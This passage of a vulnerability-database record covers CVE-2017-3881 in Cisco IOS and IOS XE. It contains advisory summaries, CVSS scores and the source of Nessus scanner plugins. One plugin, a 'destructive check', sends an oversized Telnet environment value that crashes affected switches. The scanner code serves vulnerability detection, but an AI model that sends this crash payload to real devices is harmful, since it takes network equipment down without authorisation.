period \u2014 Thanks to the [CIA for holding the flaw](<https://thehackernews.com/2017/03/cia-wikileaks-hacking.html>). \n \nCisco will update its IOS Software Checker tool immediately as soon as the patches come out.\n", "cvss3": {}, "published": "2017-03-19T21:20:00", "type": "thn", "title": "Disable TELNET! Cisco finds 0-Day in CIA Dump affecting over 300 Network Switch Models", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2017-03-20T08:20:05", "id": "THN:02E235897DBA5868AE53102FE4D52D7B", "href": "https://thehackernews.com/2017/03/cisco-network-switch-exploit.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:27:25", "description": "A remote code execution vulnerability exists in Cisco IOS. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-04-15T00:00:00", "type": "checkpoint_advisories", "title": "Cisco IOS Remote Code Execution (CVE-2017-3881) - Ver2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3881"], "modified": "2018-07-31T00:00:00", "id": "CPAI-2018-0780", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-09-20T18:39:38", "description": "A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-17T00:00:00", "type": "attackerkb", "title": "CVE-2017-3881", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-3881"], "modified": "2020-07-30T00:00:00", "id": "AKB:03BDD457-EC02-4410-980D-4DF5F9581298", "href": "https://attackerkb.com/topics/JUjQ3NwnXS/cve-2017-3881", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T14:10:33", "description": "According to its self-reported version and configuration, the Cisco IOS XE software running on the remote device is affected by a remote code execution vulnerability in the Cluster Management Protocol (CMP) subsystem due to improper handling of CMP-specific Telnet options. An unauthenticated, remote attacker can exploit this by establishing a Telnet session with malformed CMP-specific telnet options, to execute arbitrary code.", "cvss3": {}, "published": "2017-03-27T00:00:00", "type": "nessus", "title": "Cisco IOS XE Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:cisco:ios_xe"], "id": "CISCO-SA-20170317-CMP-IOSXE.NASL", "href": "https://www.tenable.com/plugins/nessus/97992", "sourceData": "#TRUSTED 53b4da1b931b4039fa7ce3545bcd29d055b1d0917f9915a12f3d4dab3a00d58f8345d32b914285af243461f5c55bdb400a2f5000f8451f2412f683d7796b6526a6529ec0d35d3cf54da04a1f677cc4288d9a8b490f028ccda5923f66d9d12818c298b5a4e2e484813d57e1666c42c9173b5ddc80e7221b5169e570656f9ee4b0e2ee347168410d067b4af6f611f4212576b44c91f5ed3d207316204ad6dc08b16e1f1309500df73330979dba3008ab995801125539c3e9d19f4dc6ee48af007f61c29e5750b27eaa87884675a272e824b62efca92ca7ba08af4648bf5bd236f7d3bde896a71d3ac57f3e901ae9ebc629cfc762733df42e3bbd55f2ec857d5efc01bb947fb2fab841272b5a15f49ce5dbd63faa9f5609964a1876431f5e6f00f7e895c786d665aed56d4d46130f05aaeac647f26da889fd5e73249075f5516fa0959d75317687bc33c11a429b4d8610c9e3ab36fbe20014ea70a3fd6e4f65119de1964b0929ce2dada5087602889bf411a07d95e0ea3ab7c07dd735e0215a3e46618cb699770cfc8a46b8fdefb4e173e8587f4d2d9d520fffdd00c28e313aa46fdd9fad6d62ee3d7a003530bb6bf9d7c67e8fe690f3f4b8ccf34d86b0b9a058e478fab45aeec0adb35670a26aca88b22fa9b014f8355fbb90c4178c6ceb43eef0a00c664c0e3f3307ecff590c5e57240c2a0e161a311141ff2e03db5f7cc001b5\n#TRUST-RSA-SHA256 56853a44a96629228a935bd2b590591879f8e95fa3ef4cfd8d6455e5b0dceb8884229cabc7cc4edba0c1cff7782846e3289915bdc0a48aee2f2c7ec99a006ac9c206c4525eb8051addd42d0b5ea475d57041a39dfea518a4a8fb943f6a5f27ed33dcb90a619ee631850526426bb706139bbb151e49bbbb0e424be3cba3afb2735ab4bb2e62250682f6a8310b0e964f9a30b089c4ebe762484b8aaa03b32be6a9a96078e69858fa40859b04a0fb11ff4f5a119f5d90d3a3bb48390c21f40168ab84ba89adb8ac0974587f629ee65e54df1ffffce164ba10ae2e04345ee5256bc9b4b1a83ddf21a40712608dc4cf141f537fc069e206a1efedcaa5aae1e8f74abf057c88df131b18cbce282016b178179d1c4253052502705b82f969c0883bb9c6b56b91ed77a1299a8ae21994349e1d806d5a17e276134561fd50b61e62e4023fb05b2be43bf5bf50b5a2819f1effed7b4376185c754d1af083e9f740db8f1272992ae32398889094112232d0744cdccaef81970f40025d04106b055cfdb421c9bdb60bb97b1ef7f9dbb1f3c14f17723d9f97aed03eeebea15a55c90e6061598eca47cd2379f5b6d3624139c75841160dc00783f39eb17d34f330e10764976b2bf5c7abb74ebbcc3fb055b21883c3c3ed306b284ca9bce9203dddc4cf4b464586a207a785126672d4fec9915986e661c42ad4f0dc746f280e0686584820cafaa7\n#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97992);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2017-3881\");\n script_bugtraq_id(96960);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvd48893\");\n script_xref(name:\"IAVA\", value:\"2017-A-0073\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20170317-cmp\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Cisco IOS XE Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version and configuration, the Cisco\nIOS XE software running on the remote device is affected by a remote\ncode execution vulnerability in the Cluster Management Protocol (CMP)\nsubsystem due to improper handling of CMP-specific Telnet options. An\nunauthenticated, remote attacker can exploit this by establishing a\nTelnet session with malformed CMP-specific telnet options, to execute\narbitrary code.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cb68237\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvd48893. Alternatively, as a workaround, disable the Telnet\nprotocol for incoming connections.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-3881\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:ios_xe\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ios_xe_version.nasl\");\n script_require_keys(\"Host/Cisco/IOS-XE/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"cisco_func.inc\");\ninclude(\"cisco_kb_cmd_func.inc\");\n\nflag = 0;\noverride = 0;\ncmds = make_list();\n\nver = get_kb_item_or_exit(\"Host/Cisco/IOS-XE/Version\");\n\n# Check for vuln version\n# these were extracted from the CVRF\nif (\n ver == \"2.2.0\" ||\n ver == \"2.2.1\" ||\n ver == \"2.2.2\" ||\n ver == \"2.2.3\" ||\n ver == \"2.3.0\" ||\n ver == \"2.3.1\" ||\n ver == \"2.3.1t\" ||\n ver == \"2.3.2\" ||\n ver == \"2.4.0\" ||\n ver == \"2.4.1\" ||\n ver == \"2.4.2\" ||\n ver == \"2.4.3\" ||\n ver == \"2.5.0\" ||\n ver == \"2.5.1\" ||\n ver == \"2.6.0\" ||\n ver == \"2.6.1\" ||\n ver == \"3.1.0SG\" ||\n ver == \"3.1.1SG\" ||\n ver == \"3.2.0SG\" ||\n ver == \"3.2.0XO\" ||\n ver == \"3.2.10SG\" ||\n ver == \"3.2.11SG\" ||\n ver == \"3.2.2SG\" ||\n ver == \"3.2.3SG\" ||\n ver == \"3.2.4SG\" ||\n ver == \"3.2.5SG\" ||\n ver == \"3.2.6SG\" ||\n ver == \"3.2.7SG\" ||\n ver == \"3.2.8SG\" ||\n ver == \"3.2.9SG\" ||\n ver == \"3.3.0SG\" ||\n ver == \"3.3.0SQ\" ||\n ver == \"3.3.0XO\" ||\n ver == \"3.3.1SG\" ||\n ver == \"3.3.1SQ\" ||\n ver == \"3.3.1XO\" ||\n ver == \"3.3.2SG\" ||\n ver == \"3.3.2XO\" ||\n ver == \"3.4.0SG\" ||\n ver == \"3.4.0SQ\" ||\n ver == \"3.4.1SG\" ||\n ver == \"3.4.1SQ\" ||\n ver == \"3.4.2SG\" ||\n ver == \"3.4.3SG\" ||\n ver == \"3.4.4SG\" ||\n ver == \"3.4.5SG\" ||\n ver == \"3.4.6SG\" ||\n ver == \"3.4.7aSG\" ||\n ver == \"3.4.7SG\" ||\n ver == \"3.4.8SG\" ||\n ver == \"3.4.9SG\" ||\n ver == \"3.5.0E\" ||\n ver == \"3.5.0SQ\" ||\n ver == \"3.5.1E\" ||\n ver == \"3.5.1SQ\" ||\n ver == \"3.5.2E\" ||\n ver == \"3.5.2SQ\" ||\n ver == \"3.5.3E\" ||\n ver == \"3.5.3SQ\" ||\n ver == \"3.5.4SQ\" ||\n ver == \"3.5.5SQ\" ||\n ver == \"3.6.0E\" ||\n ver == \"3.6.1E\" ||\n ver == \"3.6.2E\" ||\n ver == \"3.6.3E\" ||\n ver == \"3.6.4E\" ||\n ver == \"3.6.5aE\" ||\n ver == \"3.6.5bE\" ||\n ver == \"3.6.5E\" ||\n ver == \"3.6.6E\" ||\n ver == \"3.7.0E\" ||\n ver == \"3.7.1E\" ||\n ver == \"3.7.2E\" ||\n ver == \"3.7.3E\" ||\n ver == \"3.7.4E\" ||\n ver == \"3.8.0E\" ||\n ver == \"3.8.0EX\" ||\n ver == \"3.8.1E\" ||\n ver == \"3.8.2E\" ||\n ver == \"3.8.3E\" ||\n ver == \"3.9.0E\" ||\n ver == \"3.9.1E\"\n)\n flag++;\n\nif(!flag)\n audit(AUDIT_INST_VER_NOT_VULN, \"Cisco IOS XE\", ver);\n\n# Check if the CMP subsystem is present, then\n# Check that device is configured to accept incoming Telnet connections\nif (get_kb_item(\"Host/local_checks_enabled\"))\n{\n flag = 0;\n\n # CMP subsystem check\n command = \"show subsys class protocol | include ^cmp\";\n command_kb = \"Host/Cisco/Config/\" + command;\n buf = cisco_command_kb_item(command_kb, command);\n if (check_cisco_result(buf))\n {\n if (!preg(string:buf, pattern:\"^cmp\\s+Protocol\", multiline:TRUE))\n {\n # cmp subsystem is not present, so we can audit out as the\n # device is not vuln\n audit(AUDIT_INST_VER_NOT_VULN, \"Cisco IOS XE\", ver + \" without the CMP subsystem\");\n }\n # otherwise the CMP subsystem is present so we continue on to check\n # if incoming telnet is enabled\n cmds = make_list(cmds, command);\n }\n else if (cisco_needs_enable(buf))\n {\n flag = 1;\n override = 1;\n }\n\n # check that the device is configured to accept incoming Telnet connections\n # from the advisory\n command = \"show running-config | include ^line vty|transport input\";\n command_kb = \"Host/Cisco/Config/\" + command;\n buf = cisco_command_kb_item(command_kb, command);\n if (check_cisco_result(buf))\n {\n # if transport input lists \"all\" or \"telnet\", we are vuln\n # otherwise, if there is a \"line vty\" that is not followed by a\n # transport input line, we are vuln\n # otherwise, we are not vuln\n if (preg(string:buf, pattern:\"^\\s+transport input.*(all|telnet).*\", multiline:TRUE))\n {\n flag = 1;\n cmds = make_list(cmds, command);\n }\n else\n {\n lines = split(buf, keep:FALSE);\n for (i = 0; i < max_index(lines); i++)\n {\n line = lines[i];\n if ((i+1) >= max_index(lines))\n next_line = \"\";\n else\n next_line = lines[i+1];\n\n if (line =~ \"^line vty\" && next_line !~ \"^\\s+transport input\")\n {\n flag = 1;\n cmds = make_list(cmds, command);\n break;\n }\n }\n }\n }\n else if (cisco_needs_enable(buf))\n {\n flag = 1;\n override = 1;\n }\n\n # no CMP subsystem, no telnet enabled = not vuln\n if (!flag && !override) audit(AUDIT_OS_CONF_NOT_VULN, \"Cisco IOS XE\", ver);\n}\n\nif (flag)\n{\n security_report_cisco(\n port : 0,\n severity : SECURITY_HOLE,\n override : override,\n version : ver,\n bug_id : 'CSCvd48893',\n cmds : cmds\n );\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:30", "description": "The remote device is affected by a remote code execution vulnerability in the Cluster Management Protocol (CMP) subsystem due to improper handling of CMP-specific Telnet options. An unauthenticated, remote attacker can exploit this by establishing a Telnet session with malformed CMP-specific telnet options, to execute arbitrary code.", "cvss3": {}, "published": "2017-10-11T00:00:00", "type": "nessus", "title": "Cisco IOS Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp) (destructive check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:cisco:ios"], "id": "CISCO-SA-20170317-CMP-DOS.NASL", "href": "https://www.tenable.com/plugins/nessus/103783", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103783);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2017-3881\");\n script_bugtraq_id(96960);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvd48893\");\n script_xref(name:\"IAVA\", value:\"2017-A-0073\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20170317-cmp\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Cisco IOS Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp) (destructive check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote device is affected by a remote code execution\nvulnerability in the Cluster Management Protocol (CMP) subsystem due\nto improper handling of CMP-specific Telnet options. An\nunauthenticated, remote attacker can exploit this by establishing a\nTelnet session with malformed CMP-specific telnet options, to execute\narbitrary code.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cb68237\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID\nCSCvd48893. Alternatively, as a workaround, disable the Telnet\nprotocol for incoming connections.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-3881\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:ios\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_KILL_HOST);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 Tenable Network Security, Inc.\");\n\n script_dependencies(\"telnet.nasl\");\n script_require_ports(\"Services/telnet\", 23);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"telnet_func.inc\");\n\nport = get_service(svc: 'telnet', default: 23, exit_on_fail: 1);\n\nsoc = open_sock_tcp(port);\nif (! soc) audit(AUDIT_SOCK_FAIL, port);\n\nIAC = '\\xff';\nENV = '\\x24';\nIS = '\\x00';\nSEND = '\\x01';\nUSERVAR = '\\x03';\nVALUE = '\\x01';\nSB \t = raw_string(OPT_SUBOPT);\nSE = raw_string(OPT_ENDSUBOPT);\n\n# Consume what the server sends \ntelnet_negotiate(socket:soc); \n\n# Query environment variables\nreq = IAC + SB + ENV + SEND + USERVAR + IAC + SE;\nsend(socket: soc, data: req);\nr = recv(socket: soc, length: 1024);\n\n# Affected devices should have the \"CISCO_KITS\" variable\nenv_name = 'CISCO_KITS';\nif (env_name >!< r)\n{\n audit(AUDIT_HOST_NOT, 'affected');\n}\n\n# Three parts in env value\nenv_val = \n '3:' \n + crap(data:'A', length:0x400) # data to be copied to a stack buf\n # seen: 0x80 bytes to RA\n + ':9:';\n\n# Attempt to crash the switch\nreq = IAC + SB + ENV + IS + USERVAR + env_name + VALUE + env_val + IAC + SE;\nsend(socket: soc, data: req);\nsleep(3);\nclose(soc);\n\nif (service_is_dead(port:port))\n{\n security_report_v4(\n port: port,\n severity: SECURITY_HOLE\n ); \n}\nelse\n{\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:10:04", "description": "According to its self-reported version and configuration, the Cisco IOS software running on the remote device is affected by a remote code execution vulnerability in the Cluster Management Protocol (CMP) subsystem due to improper handling of CMP-specific Telnet options. An unauthenticated, remote attacker can exploit this by establishing a Telnet session with malformed CMP-specific telnet options, to execute arbitrary code.", "cvss3": {}, "published": "2017-03-27T00:00:00", "type": "nessus", "title": "Cisco IOS Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-3881"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:cisco:ios"], "id": "CISCO-SA-20170317-CMP-IOS.NASL", "href": "https://www.tenable.com/plugins/nessus/97991", "sourceData": "#TRUSTED 444f975a1a4211c43dc1ecaf0e46f9b86dfadc3e2accde60ee35f6744ce9a7c7659d22be0da40d1bf3cbc1769b23a98f848d7defa893f6654d1b33ae6dc09dd4aa08f827469f95f99fdf820ebef9994de55ece4da91116159305be560830f70e5e5d4e39767dc38c0531695c3e601fbac3d4860822d257422544a4e73b33f9be7f4df2877074c8f725a1c06e8c343bb5d1df38a28112f4951f0041d60680f8ab1eaab9e1ca2013262b536204a186c816bd1de4d2bcce15a045784a83b27bf3ddf051a6e99079c19be5946b45042d280ec0e495a8da53f343415c236b69b7c9b65195be874593e8ccf4fde8ffea57e5d0ae029d2ac110889faa25296b4b47fe9bdc521b1b730b6baa445f4c325f53fbb60e2a029c37b4bdadb2cc82aecf238b587cc12b7b6fe643b95b1c4adc8335aab31aa891abd3182e2d60e5aeb3dedec75805f58e527cd1284aab8795f842f1605bd744836e3a27656630e407cbd81eb59b2e66d9f436928306b59186e3e6414fa439e763d05ee57c7e91a05489bef1e8f8854a381d1b70d315ac2115cc0b846ebcafe323df18f8145f90ee80c9a6e5e2cb808b1ab36ad307a476d97a28c541e43e058cce0724509a8f6912d20c4b1ae3680488fb4f3879ab46c14fd19af80a812632d07da7b5fce0141e7e799c1cd58199fadeb172c36e9917cdadf5b36b06e7bffa37f8c3faede9afd2d6b736ca8f6b7a\n#TRUST-RSA-SHA256 59194918423f85a44b1039320adba6f5162921eebf2e0e8bece87d694b32853f7c11abfbec2073ebf8cbc5faf05212635fa1de32f60c4c388e62041fa2cbc11f6ba090cafaa9ca5a85d8c86b3004d6483f48c4f434d15e71b97872d0d1705c91c0f38ddf6f32ebdda54458124c97e072f71ca36a97e14d3e548fbd5bb4187a801561d06c31e214cfaef042d9fc8076744f2f9341aaabf512b02a4c0f7104457ed73103f1dfde3a86c017805a2ff3d0eb916ce0d0d7aad542c9806bb46e8e075d249ff0e83cf06be4192d37c921fa2f8d1dfa4a5e2674265c55c0a2905e96a95998402c8f7f1000b138eeb1cf03688ac8b76762839614e4a15250e4b19cafa07d426b25cf1f765d3dcda8e9330f91bf5ab31da3dc33a50732b813d90c733b801468168d57c7efe8586d4f2ea1cb46c092d1df93d0b5b7534d5aaa1f7b5067aca4af13af4df7672cb4ede1464288a7e2a3649033c2dc448e5e14c1387262b55e15b8acb32f4c5eb8ead7c49983524c99cb3a4fd552758993c69883b1279687960e1dabe2d1b76abad195e0000a7fd17fb3c311b499b32a75e80d08a5636cb2b4a4c575bf62a58d4ebb09311e8f3b83526c50716b180d5b7bccd196cf3cfd749c524fe1249b14af01c1240aebfa242a910aceb8146911d8a95110a00fa8cfa8afadf12a12bb9d1d84892e61352ff25146b6e136730aec75864a9ebc85ff24c28d59\n#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97991);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2017-3881\");\n script_bugtraq_id(96960);\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCvd48893\");\n script_xref(name:\"IAVA\", value:\"2017-A-0073\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20170317-cmp\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Cisco IOS Cluster Management Protocol Telnet Option Handling RCE (cisco-sa-20170317-cmp)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version and configuration, the Cisco IOS software running on the remote device is\naffected by a remote code execution vulnerability in the Cluster Management Protocol (CMP) subsystem due to improper\nhandling of CMP-specific Telnet options. An unauthenticated, remote attacker can exploit this by establishing a Telnet\nsession with malformed CMP-specific telnet options, to execute arbitrary code.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cb68237\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the relevant fixed version referenced in Cisco bug ID CSCvd48893. Alternatively, as a workaround, disable\nthe Telnet protocol for incoming connections.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-3881\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:cisco:ios\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_ios_version.nasl\");\n script_require_keys(\"Host/Cisco/IOS/Version\");\n\n exit(0);\n}\n\ninclude('cisco_workarounds.inc');\ninclude('ccf.inc');\n\nvar product_info = cisco::get_product_info(name:'Cisco IOS');\n\nvar version_list=make_list(\n '12.2(22)S',\n '12.2(20)S',\n '12.2(18)S',\n '12.2(25)S',\n '12.2(20)S2a',\n '12.2(20)S4a',\n '12.2(20)S5',\n '12.2(18)S1',\n '12.2(20)S4',\n '12.2(18)S2',\n '12.2(18)S4',\n '12.2(25)S2',\n '12.2(20)S2',\n '12.2(18)S3',\n '12.2(20)S6',\n '12.2(20)S3',\n '12.2(25)S1',\n '12.2(20)S1',\n '12.1(9)EX',\n '12.2(14)SZ',\n '12.2(14)SZ5',\n '12.2(14)SZ6',\n '12.2(14)SZ3',\n '12.2(14)SZ4',\n '12.2(14)SZ1',\n '12.2(14)SZ2',\n '12.2(25)EW',\n '12.2(20)EWA',\n '12.2(25)EWA',\n '12.2(25)EWA6',\n '12.2(25)EWA5',\n '12.2(25)EWA1',\n '12.2(25)EWA10',\n '12.2(25)EWA8',\n '12.2(20)EWA1',\n 